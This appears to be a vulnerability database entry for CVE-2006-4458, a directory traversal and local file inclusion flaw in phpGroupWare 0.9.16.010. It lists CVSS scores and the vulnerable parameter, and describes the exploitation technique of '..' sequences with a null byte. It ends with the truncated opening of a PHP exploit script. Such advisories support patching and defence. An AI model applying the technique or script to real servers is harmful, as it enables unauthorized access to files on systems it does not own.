6.4
CVSSv2

CVE-2006-4458

Published: 31/08/2006 Updated: 19/10/2017
CVSS v2 Base Score: 6.4 | Impact Score: 4.9 | Exploitability Score: 10
VMScore: 645
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

Vulnerability Summary

Directory traversal vulnerability in calendar/inc/class.holidaycalc.inc.php in phpGroupWare 0.9.16.010 and previous versions allows remote malicious users to include arbitrary local files via a .. (dot dot) sequence and trailing null (%00) byte in the GLOBALS[phpgw_info][user][preferences][common][country] parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

phpgroupware phpgroupware 0.9.16.010

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? /* this works against register_globals=On and magic quotes = off :) /str0ke */ /* vulnerable code => calendar/inc/classholidaycalcincphp line 14-33: /* $Id: classholidaycalcincphp,v 15 2001/08/26 12:32:28 skeeter Exp $ */ if (empty($GLOBALS['phpgw_info']['user']['preferences']['common' ...